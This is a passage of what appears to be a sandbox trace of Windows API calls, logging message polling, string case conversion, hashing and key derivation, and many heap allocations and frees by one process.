hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.579] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.579] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.579] CryptHashData (hHash=0xaa5920, pbData=0x24b1c18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.579] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.580] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.580] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.580] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.580] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0252.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8e0 [0252.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.591] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.591] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | 